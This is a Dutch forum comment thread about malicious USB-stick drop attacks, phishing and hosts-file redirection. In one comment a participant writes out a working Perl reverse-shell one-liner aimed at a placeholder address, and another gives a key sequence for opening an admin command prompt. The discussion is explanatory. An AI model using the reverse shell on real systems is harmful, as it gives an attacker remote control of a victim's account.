Perfecte beveiliging bestaat niet. Naast de aanvalsvectoren die genoemd worden in boven vernoemd artikel heb je ook nog altijd zaken zoals social engineering die vaak snellere en betere resultaten opleveren.

Uiteindelijk komt het er op neer dat de veiligste systemen zo hard in de weg zitten dat je nog amper werk gedaan krijgt. Beveiliging moet daarom een balans zien te vinden tussen veiligheid en productiviteit in een bedrijfsomgeving. Enkel in zeer specifieke gevallen zal die balans volledig overhellen naar de veiligheid.

Bij ond heeft in principe geen enkele eindgebruiker admin rechten. Ik schrijf in principe omdat ik al voldoende mensen ben tegengekomen die op hun systeem wel degelijk de nodige rechten hebben om te doen en laten wat ze willen, wat dan vaak weer een gemakelijkheidsoplossing is vanuit de IT dienst. En zo staan we terug bij mijn eerste punt: social engineering.
Welkom in de wereld van de Security driehoek;

security vs gebruikersvriendelijkheid vs functionaliteit.

En in een professionele organisatie: eindgebruikers met admin rechten .. dat is echt not done. Niet eens uit het oogpunt van Security maar ook al uit het oogpunt van beheer.
USB sticks blijven natuurlijk altijd een dingetje ;)
Ik vraag mij af of het nuttig is om de foto's of muziek van een USB stick eerst te kopiëren naar een Settopbox en deze dan vervolgens via een eigen USB stick over te zetten op je PC.

Is het mogelijk om via een Settopbox alle virussen eruit te filteren?
Met Qubes valt het wel mee. Dat is ook een 'huidig' OS en lost precies dit soort problemen op.
Ook op bedrijfspc's gebeuren zo'n dwaasheden - lees: ouders die de "kindjes" laten facebook-gebruiken omdat hunne pc al naar de sjoekedijzen is van de malware...
Erger nog voor een "snoepbar" geeft men z'n wachtwoorden af.
USB-sticks die je uitdeelt worden in de werk-pc gestopt.
De thuispc is al helemaal een synoniem voor "bordeelpc" - daar zit meer malware op dan <de rest censureren we vanwege niet geschikt voor jongere lezers...>
Als ik een stick krijg, koop (ook harde schijven, ssd's e.v.a.) - dan is 't eerst wat we doen - format /U (alles overschrijven met iets F6 is goed genoeg) - onder linux gebruiken we /dev/zero - meer moet niet.
Laten we eerlijk blijven de fabrikanten van software hebben ook hun best gedaan - automatisch openen, autorun.inf - en dan nog's extensies gaan verbergen - laat de gebruiker toch de controle - geef hen die verantwoordelijkheid - hou gebruikers niet dom.
Doe die mooie startschermpjes weg - en laat hen zien wat er gebeurt - dat is mijn grootste frustratie - dat teletubbie gedoe - wie iets afwijkends ziet - gaat sneller een helpdesk bellen (soms is't loos alarm - maar als 't iets serieus is, ga je 't tenminste sneller weten).
Gebruikers dom houden - en dat hebben ze bijna allemaal gedaan - die software-makers, is mede de oorzaak dat men zich geen barst meer aantrekt van security. De cloud doet dat wel, fabrikant xyz=onfeilbaar, mij kan niks gebeuren, enz...
Tegenwoordig hackt men al pc's via de printers in't netwerk.
Dit artikel lift maar een deeltje van 't probleem op. Zoals onderaan gezegd wordt - laag 8 is vaak een probleem - userfriendly omschrijft dat als PEBCAC. haha. Die psychologie doorgronden zou een plichtvak moeten zijn voor elke IT-er en dat zou jaarlijks moeten bijgeschaafd worden - hoe denken eindgebruikers. (ik zal dat van de zoo maar niet schrijven)...
Ge moogt mijn schrijfsels wel met een kilootje zout nemen, aan de kern wijzigt er niet zo veel, de mens is vaak de zwakkere schakel - maar vooral niet-communicatie (nog meer dan slechte-communicatie) is een oorzaak van veel ellende. Hoe komt dat - te veel info - te weinig structuur - tegenstrijdige orders... Verzorg uw communicatie - laat toe dat men planning maakt, en poog duidelijk te zijn. Misschien moeten we meer die tune van de life of bwian gaan zingen! (Monty Python).
Je gaat op een nieuwe schijf een format uitvoeren terwijl er niet eens een partitie aanwezig is ... good luck.

Het gaat hem ook niet om gebruikers dom houden, het gaat hem erom om domme gebruikers ook toegang te geven tot je platform. Niet iedereen is een tweaker, niet iedereen kent alle ins en outs van een computer. En als je bekijkt welke fouten ervaren ITers al maken als het op beveiliging aankomt, wat verwacht je dan eigenlijk echt van de gewone thuisgebruiker?
Nee, het failliet van de huidige OS'en is de gebruiker, dat staat eigenlijk ook letterlijk in het artikel. En ik kan dat alleen maar onderschrijven. In beginsel is het nog altijd zo dat je zélf de veroorzaker bent van een probleem met je PC, omdat je niet hebt opgelet en klakkeloos handelingen hebt zitten uitvoeren. Want er bestaat simpelweg geen andere uitleg voor dat gebruiker A nooit problemen heeft, en gebruiker B wel, op hetzelfde OS.

Wat écht nodig moet veranderen zijn niet de OS'en maar de mindset van de gebruiker van een PC waarop ook belangrijke zaken opgeslagen staan. Je data moet je gewoon beveiligen, net zoals je een huis beveiligt. Kan er dan nooit meer worden ingebroken? Natuurlijk wel, maar je kan de kans dermate klein maken dat jij wel het laatste huis bent waar het inbreken aantrekkelijk is. Om dit dan even door te trekken naar de huidige omgang met de PC: mensen zetten hun deur wagenwijd open en roepen voordat ze gaan slapen nog even over straat dat ze nu niet meer opletten dus kom gerust binnen! Om vervolgens alle deuren af te sluiten met exact dezelfde sleutel die altijd onder de deurmat te vinden is.

Wat een OS moet doen om die mindset te veranderen? Niets. Windows doet het al en heeft daar bijvoorbeeld een prima balans in gevonden, met heldere taal en duidelijke meldingen met uitroepteken, stopbord of wat dan ook. Als dat je niet beweegt tot nadenken, dan is het wat mij betreft een gedane zaak - geen enkele motivatie behalve de diefstal zelf gaat die gebruiker nog anders laten handelen.

Verder met betrekking tot de USB stick - 100% nieuwsgierigheid maakt daar het lek.

[Reactie gewijzigd door Vayra op 7 augustus 2016 11:39]

Gaaf artikel weer! Interesssant hoor.
Snap het alleen nog niet 100%: als je zo'n usb-stick in je pc duwt, ben je DAN al infected? Of moet je nog iets opstarten/aanklikken?
Ja, je hoeft niks aan te klikken. Er zijn twee manieren hoe dit kan gaan:
- de usb stick is een toetsenbord dat automatisch toetsenaanslagen verstuurt. Deze toetsenaanslagen zijn een hotkey om een command line interface te starten en zo een reverse shell op te zetten
- de drivers van de usb stick worden aangepast zodat deze een 0-day exploiten zodra de drivers ingeladen worden

Zie ook deze link: https://www.elie.net/blog...to-create-a-realistic-one

(de link in het artikel, het woord "beschikbaar", werkt niet)

[Reactie gewijzigd door Electric Vibes op 6 augustus 2016 10:58]

Om te zien hoe makkelijk zelfs mensen zoals tweakers in phishing trappen is deze link ook heel interessant.
Daarvoor moet je wel iets meer doen dan naar een valide YT-url linken... Het domein YT doet niet aan phising, de content misschien wel maar dat gaat alweer een stapje verder.
yep, ik heb inderdaad gewoon even gekeken waar de URL naartoe gaat en dan zie je een valide URL, dat ik erop klikte, betekent niet dat ik in phisphing trapte
En juist dat is niet voldoende. Met javascript worden die url's eenvoudig gemaskeerd. Het grootste voorbeeld is google. Kijk naar een gemiddeld zoekresultaat, ga er met je muis boven hangen en je denkt dat je de url ziet waar je heen gaat, maar in werkelijkheid zit er een stukje javascript achter die je (eerst) naar een andere site stuurt en dan pas naar de site waar je heen wilt....anders zou google geen bestaansrecht hebben. Dus staar je niet zomaar blind op de url die de browser je laat zien!
Volgens mij kom je wel op de url die google weergeeft, maar die pagina/domein kan je weer doorsturen via js of php, htaccess.

En je kan ook geen script gebruiken in je post.
Misschien moet je het eerst uitproberen met de juiste tools (bijv.firebug) voordat je het tegenspreekt. Het feit dat jij denkt dat het anders is geeft al aan hoe slim google en anderen het voor elkaar kunnen hebben zonder dat je het door hebt :P
Omdat het voorbeeld zoals je het beschrijft gewoon niet klopt.

Alleen al vanuit het oogpunt tegen phising zou google geen urls in de resultaten maskeren.

Wat wel kan, en waar google geen invloed op heeft, is dat je via het resultaat waar je op klikt doorgestuurd wordt.

Zoals winkel.td/artikel.bla
naar winkel.td of zelfs anderewinkel.td

Je kan gewoon niet, zoals je zegt, eerst naar een andere site gaan en dan pas naar de site die google aangeeft.

Daar moet ik echt een voorbeeld URL van zien want het zou een hele rare situatie zijn.

Ps. Je kan met firebug (of beter, chrome dev tools) alleen lokale bestanden inspecteren.

[Reactie gewijzigd door smittiehz op 9 augustus 2016 14:49]

8)7 je wilt het niet begrijpen.
Die andere site is trouwens Google. Je ziet in Google resultaten bijvoorbeeld www.tweakers.net, maar dan ga je eerst naar google en dan pas naar tweakers....terwijl de url die jij ziet al die tijd www.tweakers.net liet zien.
En nu stop ik :O
Kan je wel boos worden maar je verhaal klopt nog steeds niet O+

"Die andere site is trouwens Google."

Dan is het dus ook geen andere site.
Maar oke. Doei.

[Reactie gewijzigd door smittiehz op 11 augustus 2016 15:39]

nou is dQw4 een goeie combinatie om te onthouden. ;)
Oops i did it again......
Jammer dat je geen count hebt hoeveel er heen gaan....
Yes! Ik hou van dit soort linkjes
Om te zien hoe makkelijk zelfs mensen zoals tweakers in phishing trappen is deze link ook heel interessant.
Ik denk als je minder smartass achtig begon in het bericht dat er nog veel meer mensen op zouden hebben geklikt...
Klopt, en zelfs nu wist er nog op geklikt. En ik was te lui om een redirect via mijn eigen site in te stellen. Was wat realistischer geweest.

Anyweg, het is maar goed dat ik geen verstand heb van malware :-)

Bovendien is deze link illustratief voor alle keren dat je in een 'foute' link bent getrapt. Wie is er nou nog nooit gerickrolled?

[Reactie gewijzigd door theBazz op 6 augustus 2016 12:44]

Sommige linkjes hoef je niet eens te klikken om te weten wat er gebeurt :|
youtu.be/.Q..........Q Ja ja...
Ja en de derde mogelijkheid is dus dat er een bestandje op wordt gezet die geopend wordt. Ze staan gelukkig ook alle 3 genoemd in het artikel zelf.
Als het herkend wordt ls toetsenbord is insteken genoeg. Zoals in het artikel staat, 1 korte popup van de command prompten na zes seconden ben je de sjaak.
Zoveel seconden hoeft niet eens. De prompt hoef je maar heel even voorbij te zien flitsen. Er vanuit gaande dat je een vlot systeem hebt, en het HID stickje erg rap toetsaanslagen erin kan rammen voor jij door hebt wat er eigelijk net gebeurde.
Hoeft die prompt eigenlijk perse te verschijnen? Kan die exploit niet gewoon helemaal ongemerkt toegang krijgen tot de command prompt en deze runnen? Mij lijkt het dat slachtoffers dat vrij verdacht vinden, ook al flits die maar even.

[Reactie gewijzigd door ProgrammingLife op 6 augustus 2016 12:25]

Uiteraard kan het op de achtergrond. Ik raad je ook eens aan om dit te lezen:

http://null-byte.wonderho...corp-untraceable-0164294/

Daar wordt uitgelegd hoe gemiddelde ransomware werkt. Interessant leesvoer. En erg geniepig.
Bedankt! Enorm interessant. Cybersecurity zegt mij weinig buiten de netwerk-basis maar mijn interesse is grappig genoeg gewekt door afgelopen week Mr. Robot S01 te kijken.
Die usb stick doet zich voor als toetsenboard, dus ja. Zodra je de stick in een pc stopt begint die heel snel alle van te voren geprogrammeerde commando's te tikken. Doordat dit zo snel gaat is het vrijwel onzichtbaar. Ik heb zoiets al eens gezien op: https://channel9.msdn.com...rlands/Hackers-Not-Halted, overigens is dit een talk die ik je kan aanraden als je nieuwsgierig bent naar de mogelijkheden.

[Reactie gewijzigd door sander85 op 6 augustus 2016 07:52]

Het is ook niet een super-nieuw idee. Er bestaat zelf een product dat je kan kopen waarmee je meteen de goede looks hebt, en via een scriptje op een micro sd kaartje payload kan laden.

Blijft wel een enorm krachtig mechanisme, omdat bijna alle OS-en uit gebruiksvriendelijkheid de toetsenborden zonder vragen vertrouwen.

offtopic: "toetsenboard" - dat moest ik wel even drie keer lezen voordat ik doorhad waarom het zo raar oogde zeg.
net zoals je vroeger slechts 10 minuten met internet verbonden moest zijn zonder firewall om geïnfecteerd te geraken, zonder dat je ook nog maar naar 1 pagina had gesurfd
Interessant artikel!

Mocht je interesseert zijn in meer 'hacks' die gebruikt worden in Mr. Robot, is dit ook leuk leesvoer:

http://null-byte.wonderhowto.com/how-to/mr-robot-hacks/

Daar staat ook een artikel over hoe een geinfecteerde USB stick wordt gebruikt (zoals ook aangehaald in het artikel). En de reden waarom ze uiteindelijk besluiten dit te doen via Bluetooth en hoe dit werkt.
http://null-byte.wonderho...t-hack-bluetooth-0163586/

Maar ook hoe ze van een bedrijf al hun data hebben encrypted en gegijzeld. Wordt ook uitgelegd dat ze dit doen omdat bij het verwijderen het e.e.a kunnen terughalen. Bij het encrypten met AES 256 en dan de master key vernietigen valt er niks terug te halen want de files zijn er gewoon. (Eerder hebben ze een backup 'farm' al vernietigd.)
http://null-byte.wonderho...corp-untraceable-0164294/

En ook een leuk stukje is het toevoegen van data in audio files. En dan een audio CD branden met deze data erop waardoor het gewoon een legitieme audio file is, maar ij werkelijkheid staat er AES-encrypted data bij op. (Stenografie)
http://null-byte.wonderho...data-audio-files-0164136/

Maar ook heel erg veel leesvoer over hoe ze via Facebook je account kunnen kraken, Wi-Fi hacking, en diverse andere zaken.
Niet alleen informatief, maar ook leerzaam om jezelf er tegen te kunnen bewapenen.

Verplicht leesvoer: http://tinyurl.com/zmm2ve6

[Reactie gewijzigd door xoniq op 6 augustus 2016 09:50]

Leuke link maar om dit als in een fishing aanval te trappen te tellen gaat een beetje ver. Ten eerste je hebt een prima reputatie op tweakers dus op dit moment levert dit weinig reden tot argwaan en daarbij komt ook nog dat de post zelf redelijk uitgebreid is en ook beoordeeld is met een dikke +2

Daarbij komt ook nog dat het enkel klikken op een malafide link niet altijd werkt gezien je dan exploits moet uitvoeren op browser en vaak ook os niveau wordt een aanval best wel lastig.

Wat vaak veel beter werkt is een gefakete inlogpagina om zo accounts te stelen. Ik ben op het werk toch zeker 2 keer fishing links tegengekomen die linkte naar een vervalste google docs om zo inloggers te bemachtigen. Waarmee je vaak ook meteen inloggegevens voor andere sites en diensten te pakken hebt.
Het is ook puur een grapje om mensen te laten klikken op zomaar een link. Daar had ik bijvoorbeeld kunnen redirecten naar een fake ING pagina bij wijze van.

Het is gewoon enkel een waarschuwing om niet zomaar op elk linkje te klikken.

Buiten dat, heb je helemaal gelijk hoor.

Ben zelfs eens tegen gekomen bij iemand dat een applicatie de hosts file had aangepast en het domein facebook.com verwees naar een alternatief IP met een valse login pagina. Dat is ook vrij nasty want de URL klopt gewoon. Ookal heb je dan geen SSL verbinding, maar daar wordt uberhaubt al te weinig op gelet.

[Reactie gewijzigd door xoniq op 6 augustus 2016 11:16]

Huh. Het is niet eentje die je zo 1-2-3 verwacht, en weinig mensen zullen er ook maar aan denken dat zoiets gebeurt is. Dat is een hele valse dat in de hosts file er een redirect gestopt wordt.
Het is zelfs geen redirect. Je ontwijkt daarmee je DNS server. Je computer krijgt een directe instructie (permanent) dat Facebook.com bij server 201.103.233.12 hoort (fictief IP). Zodra je dan naar facebook.com gaat kom je altijd uit op die - fictieve - server waar een nep website staat te wachten die wel exact zo lijkt, maar helemaal geen enkele relatie heeft met het origineel.
"Het is niet eentje die je zo 1-2-3 verwacht"

Ikzelf, enerzijds, wel.
Het is mij langere tijd opgevallen dat als een url op zichzelf legitiem lijkt, er al snel geen-een reden is voor een doorsnee gebruiker om die url niet te vertrouwen. Het is ook an-sich heel logisch, wetende dat dit dezelfde groep gebruikers is die veelal niet zou weten wat een hosts-file is, noch hoe DNS daar verder normaliter in voorziet.

Ik ben eigenlijk vooral verbaasd dat "we" dit niet veel vaker zijn tegen gekomen.
Het moet nml in theorie wel heel simpel zijn om bij infecties met worms/trojans een cookie-lookup te maken en van sites waar men een fake-portal heeft een redirect in te schuiven.

En daar bovenop; Ik weet zo 1-2-3 niet iets te noemen (van virusscanners e.d.) wat je hosts-file evt naloopt.... werd/wordt dat door sommige stukken software überhaupt gedaan?

Noem mij eventueel paranoide, maar als ik dat soort punten bijeenraap kom ik alleen maar tot de conclusie dat de hosts-file toch een redelijk "onzichtbare" aanvalsvector is, imho.

[Reactie gewijzigd door Annihlator op 6 augustus 2016 14:35]

Met HSTS kan dat natuurlijk niet meer.
Het gaat een beetje buiten HSTS om. Als jij malware hebt die de hosts file aanpast, wordt het doel van de domeinnaam veranderd. Dus stel ik laat in jouw PC facebook.com doorverwijzen naar mijn server waar ik een site host die enkel lijkt op Facebook, maar niks met Facebook te maken heeft. Jij probeert in te loggen, maar ik geef gewoon een default foutmelding. Dan lijkt het erop dat Facebook gewoon niet meer werkt op jouw computer, echter heb je nooit iets met Facebook gedaan alleen maar met mijn server. Je hebt dus niks met de SSL verbinding van Facebook van doen.

(Die kan natuurlijk voor elke website, Facebook is een populair voorbeeld, kan ook met je bank zijn. De website van de ING of Rabobank vervals je ook zomaar.)
Nee, dat werkt niet. Je browser zal proberen verbinding te maken met https://www.facebook.com, zien dat er geen geldig certificaat beschikbaar is, en dus aangeven dat je niet op de website kan komen. Probeer maar eens een entry in je hosts file aan te maken voor Google en dan naar google.com te gaan.
Net gedaan (Windows 10) en de browser gaat geen verbinding maken met de echte google.com maar wel met het IP adres wat ik in mijn hosts file heb ingevuld.
Kwestie van één regel toevoegen in de hosts file:
192.168.2.15 google.com
Waarbij dit IP adres een Linux PCtje is waar een webserver op draait.
Dit moet makkelijk door software af te vangen zijn, ook al simuleert een stick een toetsenbord dan heeft ie nog geen admin rechten.
Daarbij is 40 dollar niet niks voor een aanvaller.
Ik ben het niet eens dat gebruikers dan maar beter moeten opletten, dit is gewoon een kwestie waar de beveiliging faalt en verbeterd moet worden, software en hardware-matig.
Een toetsenbord heeft nooit admin rechten (toch?).
Het probleem is dat ik ze wel heb.
Zolang ik op een admin account aan het werk ben, kan een toetsenbord altijd alles doen.
Klopt, en in het geval dat er geen admin account gebruikt wordt, dan maken ze gebruik van een kwetsbaarheid in Linux. Zie hier:
Onderzoekers demonstreren hack Linux-pc via besmette usb-sticks

Dit is een bericht van 2014, dus toen was het al bekend. Bad USB is een kwetsbaarheid in de USB hardware specs en zonder ingrijpende wijzigingen in de architectuur niet op te lossen.

[Reactie gewijzigd door Ome Kor op 6 augustus 2016 08:44]

Klopt, als jij inlogt als root, kan malafide hardware daar ook mee aan de slag. Zelfs als jij 'sudo' gebruikt zet je een raam open van X ingestelde tijd voor een volgend commando ook weer om een wachtwoord vraagt.

Als jij een 'sudo' commando gebruikt en wegloopt, kan een malafide USB stick in feite gewoon 'sudo su' doen en het e.e.a uitvoeren zoals het verstoppen van kwaadaardige scripts op root niveau zonder dat jij dat zomaar doorhebt.

Vervolgens de history clearen om geen sporen achter te laten van de commando's (anders is het makkelijk om in de history te zien waar wat is neergezet.)
Of $40 veel is, hangt natuurlijk geheel af van de opbrengst. Brengt die stick van $40 miljoenen aan bedrijfsgegevens op, dan is het natuurlijk een schijntje.
Zelfs als je die $40 met een factor 300 moet doen.

Gebruikers falen hier wel degelijk. Je kan als ICT afdeling er nog zo op hameren dat men niet zomaar alles in moet pluggen of om het even welke link klikken van (on)bekende bron. Er hoeft er maar ééntje tussen te zitten die het wel doet en je hangt. In mijn ervaring is het altijd hetzelfde type dat het doet. Als je dan beter wilt beveiligen dan moet je die lui toegang tot op zijn minst internet ontzeggen. Kwaadwillende emails komen niet binnen en een USB die er aangehangen wordt kan iig niets meer versturen.

zie het als volgt, bedrijfsongevallen. Een maatje van mij onderzoekt die zaken en 99% van de gevallen is het 'human error'. Men heeft moedwillig de veiligheidsregels aan de laars gelapt. Ze wisten dat ze bijvoorbeeld gezekerd moesten zijn bij werken op hoogte. Deden dat vervolgens niet en vielen.
Zo ook met ICT; Je weet dat het niet moet, en toch doen.
En daar maak je een ongelooflijke fout.

Heel veel bedrijven hebben schoonmaak uitbesteed. En daar zie je de mensen vaak niet eens omdat ze na/voor kantooruren schoonmaken, ze 'lopen anders in de weg'.

En het gebeurt vaker dat er ergens wel een pc is aangesloten op het netwerk die maar half beheerd is, denk bijvoorbeeld aan printers met eigen servertje, grote schermen die moet worden aangestuurd, etc, etc.


Je moet eens een keer met een dergelijk oog een bedrijf binnenlopen,
dan zie je dat op kantoor-gedeelte waar iedereen zit het redelijk goed geregeld maar bij entree/ingang, aparte kantoortjes etc, is het huilen met de pet op.
Daar maak ik géén fout, want het Hollywood scenario die jij nu schetst zal best voorkomen. Alleen dat is niet waar het in de meeste gevallen fout gaat. In de meeste gevallen zijn het werknemers zelf van een bedrijf die de USB stick gevonden op straat gebruikt. Is het de werknemer zelf die op een malafide linkt klinkt. Of is het de medewerker zelf die door 'social engineering' (gewoon een ouderwetse babbeltruc) de wachtwoorden vrijgeeft.
Heb je 100 gevallen, zal je minstens 99 gevallen vinden waar de werknemer de schuldige is.
Je moet eens een keer met een dergelijk oog een bedrijf binnenlopen,
dan zie je dat op kantoor-gedeelte waar iedereen zit het redelijk goed geregeld maar bij entree/ingang, aparte kantoortjes etc, is het huilen met de pet op.
Aanrader is de afdeling "beveiliging", bij voorkeur de nachtwaker. Die mannen zitten zich de hele nacht door te vervelen en gaan dan maar een beetje internetten. Typisch zijn ze niet al te hoog opgeleid en hebben ze geen band met het bedrijf want ze worden via detachering ingehuurd en omdat ze nachtdiensten draaien weten ze niks van het normale reilen en zeilen in zo'n bedrijf.
De kans is groot dat je in het hokje van de beveiliger een oude PC vindt waar alle beveiliging is uitgeschakeld zodat er 's nachts porno gekekeken kan worden.
Kans lijkt me ook groot, dat die PC in een apart VLAN zit, en zo dus niet bij het "normale" netwerk kan.
Admin rechten zijn voor veel doelen helemaal niet nodig. Stel dat je via een geprepareerde usb stick een reverse shell kan krijgen op de computer van iemand die met gevoelige informatie werkt. Al die informatie kan je dan in handen krijgen, zonder dat je admin rechten nodig hebt.

Hiervoor zal nooit zo'n relatief dure methode gebruikt worden, maar een geïnfecteerde pc kan perfect in een botnet terechtkomen zonder admin rechten.

Op een windows systeem volstaat het om, bij een gebruiker die admin rechten heeft, op ok te klikken als windows erom vraagt. Als je usb stick toch een toetsenbord emuleert is dat een koud kunstje. De gebruiker gaat dan waarschijnlijk heel even iets zien op zijn scherm, maar hoeveel mensen maken zich daar nog druk over? Er draaien zoveel agents en toestanden die af en toe een een venster flashen dat men dat al bijna als normaal beschouwt.

Last but not least: op een pc waar de security patches achterlopen is de kans groot dat er verschillende privillege escalation vulnerabilities aanwezig zijn. Als je er zo eentje misbruikt heb je ook admin rechten.
"Stel dat je via een geprepareerde usb stick een reverse shell kan krijgen op de computer "
Dat kan niet omdat je geen admin-rechten hebt.

"maar een geïnfecteerde pc kan "
Hoe kan een PC geinfecteerd raken als je een geen admin-rechten hebt? Sowieso is er altijd nog de AV- en anti-malware software.

"Op een windows systeem volstaat het om, bij een gebruiker die admin rechten heeft, op ok te klikken als windows erom vraagt. "
Gebruiker met admin-rechten is dus een andere case. Daarom wil je altijd als user werken wanneer je geen admin-verantwoordelijkheid hebt. Op OK klikken is overigens niet voldoende, je zal een admin-ww moeten invoeren.
Dat kan niet omdat je geen admin-rechten hebt.
Een revere shell is een proces dat een netwerkconnectie opzet naar een c&c server (of rechtstreeks naar de aanvaller). Als dat niet zonder admin rechten kan, kan je ook niet op het web zonder admin rechten.
Hoe kan een PC geinfecteerd raken als je een geen admin-rechten hebt? Sowieso is er altijd nog de AV- en anti-malware software.
Simpelweg een scriptje in de startup map van de gebruiker zetten dat eender welke malafide actie uitvoert zodra de gebruiker aangelogd is. Geen admin rechten voor nodig, maar je pc kan zo zonder problemen in een botnet zitten of een aanvaller toegang geven via die reverse shell van hierboven.

A/V software omzeilen is eenvoudiger dan je denkt. Door de payload te verpakken in andere code (en te encrypten) zijn de meeste scanners al snel te omzeilen. Voor de ene moet je al wat meer encoding/encrypting cycles doen dan voor de andere, maar uiteindelijk zijn de meesten te omzeilen. Als er toch een scanner is die de gekende payloads uit metasploit blijft herkennen kan iets of wat aanvaller er gerust zelf eentje schrijven. Die code is dan alleen nog te blokkeren door een heuristische scan, maar software die intelligent probeert te zijn faalt zo dikwijls dat daar ook wel een mouw aan te passen is.
Op OK klikken is overigens niet voldoende, je zal een admin-ww moeten invoeren.
Dan is dat intussen veranderd, ik gebruik al jaren geen windows meer. Vroeger was een simpele ok in elk geval voldoende.
Om reverse shell op je computer krijgen, moet je die software installeren. Daarvoor heb je admin-rechten nodig.

Gezien je eerste aanname onjuist was, lijkt het me niet zinvol de rest van je verhaal te behandelen.
Als perl geinstalleerd is (niet altijd het geval op windows, maar je zult mijn punt hopelijk wel begrijpen, dit kan in zowat elke scriptingtaal):
perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "127.0.0.1:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Niks admin rechten voor nodig, je moet zelfs geen binaries installeren op het systeem. 1 simpele oneliner is voldoende om volledige controle over de gebruiker zijn account te hebben.

Een reverse shell is geen stukje software, het is gewoon een techniek. Je kan een reverse shell opzetten via perl, java, php, telnet, nc, ... Bijna eindeloos veel mogelijkheden. Als die scriptingtalen niet werken zijn er ook nog binary oplossingen, maar ik denk dat het zo wel duidelijk is dat je dus absoluut geen admin rechten nodig hebt.
Je hebt er dus wel software voor nodig. Perl, java, php, telnet, nc vind je niet op mijn PC, en op die van Jan Modaal ook niet. Dat scripting-software een security-risk zijn, is niets nieuws. Maar je zal die toch eerst moeten installeren en daarvoor heb je admin-rechten nodig.

Met een user-account kan je schade aanrichten. Maar die blijft beperkt. Dat is het idee achter user-accounts. "Controle over het systeem" is tendentieus. Beste oplossing is alleen USB-sticks aansluiten die je vertrouwt.
Hmm, jouw pc heeft dus ook geen cmd.exe? geen javascript? geen visual basic? geen .NET? zal lastig worden om applicaties te draaien.

Afgezien daarvan, zoals al opgemerkt, een simpele static binary is ook al goed. Heb je geen admin rechten voor nodig.

Een handige locatie zou bijvoorbeeld een hidden folder op de USB stick zijn ;)

[Reactie gewijzigd door borft op 8 augustus 2016 14:39]

Goed, stel dat je de executable een reverse shell mag opzetten. Dan kom je de firewall tegen, wat doe je?
Ik maak een uitgaande connectie over port 80, naar een C&C server, die mag er zeer waarschijnlijk langs, en reverse tunnel de connectie over die verbinding.

Andere optie, ik maak gebruik van een bestaande web browser om de uitgaande connectie te maken, of ga via een proxy, etc....
Je hoeft geen software te installeren. Enkel ergens waar de user schrijfrechten heeft een executable wegzetten (bij voorkeur hidden map), en deze starten. 0 admin rechten voor nodig.

Een gedownloadde exe kun je ook gewoon starten zonder eerst admin te hoeven worden; Dit is hetzelfde principe.

[Reactie gewijzigd door jon.kiji op 7 augustus 2016 07:49]

Een revere shell is een proces dat een netwerkconnectie opzet naar een c&c server (of rechtstreeks naar de aanvaller). Als dat niet zonder admin rechten kan, kan je ook niet op het web zonder admin rechten.
Dat is op zich niet noodzakelijk zo, je kan behalve identiteitsgerelateerde toegangscontrole ook toepassings/procesgerelateerde toegangscontrole hebben, een reverse-shell-proces zou dan in tegenstelling tot een webbrowser geen toegang tot netwerkdevices of andere processen (zoals een programma dat wel toegang zou hebben tot de netwerkdevices) kunnen krijgen.
Laten we eerlijk zijn, wie gebruikt zo'n systemen?

Voor thuisgebruik totaal onpraktisch, voor kleine bedrijven ook teveel werk om te configureren. Voor grote bedrijven in de meeste gevallen ook onwerkbaar of te kostelijk om alle honderden tot duizenden applicaties te whitelisten.

Ik denk dat je de bedrijven/instellingen die dit soort systemen goed gebruiken bij wijze van spreken op 1 hand kan tellen.
Iets met de zwakste schakel, u kunt wel gaan. Makkelijk om de soft en hardware de schuld te geven, maar dat is geen oplossing. Beveiliging moet daarnaast ook bruikbaar blijven voor de massa. En geen adminrechten? Dat is toch en kwestie van en keer op enter drukken als de pop-up verschijnt?

En $ 40 voor een targeted attackmet 50% kans van slagen? Klinkt als een koopje, bedenkt wel dat diegene hiervoor ook al de deur uit moet om de stick ergens te droppen (en dus blijkbaar gemotiveerd is)
PS, moet toch iedere keer weer aan badUSB denken bij dit soort artikelen, dnap iet waarom dat mooit groot is geworden.

[Reactie gewijzigd door Alxndr op 6 augustus 2016 08:00]

Beveiliging moet daarnaast ook bruikbaar blijven voor de massa.
Dat is een goed maar lastig punt omdat er geen universeel antwoord is. De muziekcomputer van de kroeg om de hoek heeft andere eisen dan de servers van de belastingdienst of het leger. Besturingssystemen (en andere software) moeten een keuze maken hoe veilig ze out-of-the-box zijn. Als dat super veilig is dan is het voor veel mensen onwerkbaar. Als de het systeem is geconfigureerd voor gemak boven veiligheid zullen velen altijd zo blijven werken, ook al past dat niet bij hun situatie.
Het antwoord is natuurlijk dat er een professionele IT-afdeling is die de beveiliging aanpast aan de organisatie maar in praktijk gaat het vaak mis.
En $ 40 voor een targeted attackmet 50% kans van slagen? Klinkt als een koopje, bedenkt wel dat diegene hiervoor ook al de deur uit moet om de stick ergens te droppen (en dus blijkbaar gemotiveerd is)
Je kan ze ook per post versturen en doen of het reclame of een relatiegeschenk is. Dat werkt misschien nog wel beter dan wachten tot iemand zo'n ding vindt.
Ik weet van bvb G Data dat zijn een usb blocker in hun pakket hebben.

Bij het aansluiten van een nieuw toetsenbord zal deze eerst geactiveerd moeten worden door een random code in te typen / klikken alvorens het invoerapparaat te kunnen gebruiken.

Ps interessant artikel :)
Als je het over windows hebt is admin rechten niet echt een probleem bij een beetje standaard instelling: de volgende toetsen combinatie levert je een administrator command prompt op mits je inlogt op een admin account wat de meeste windows gebruikers doen:
winkey+X > a > left arrow > enter
Mooi onderzoek. Ik vraag mij af of je de resultaten die bij deze studenten zijn gevonden kunt doortrekken naar de gemiddelde werknemer. (Ik verwacht van wel).
De beste beveiliging tegen een dergelijke aanval is vermoedelijk, zorgen voor een stukhe "awareness" en de mogelijkheid tot het stillen van de nieuwsgierigheid in de vorm van een geschikte pc ergens in de buurt van de ontvangst hal/receptie.
Zou een virtuele machine op een normale pc afdoende zijn?
Ik denk dat werknemers iets voorzichtiger zijn, maar je nog steeds ee redelijk resultaat behaalt als je dit bij bedrijven probeert. Studenten hebben natuurlijk minder snel een professioneel risico met het openen van bestanden op hun eigen computer of bijvoorbeeld eentje van de Universiteitsbibliotheek.

De beste beveiliging is voor bedrijven geen usb sticks kunnen gebruiken, zoals sommige/veel bedrijven al doen.

Ik kan bijvoorbeeld wel m'n telefoon aansluiten op de usb van m'n werklaptop om te ladeb, maar dan is de laptop beveiligd tegen het openen of kopiëren van bestanden.
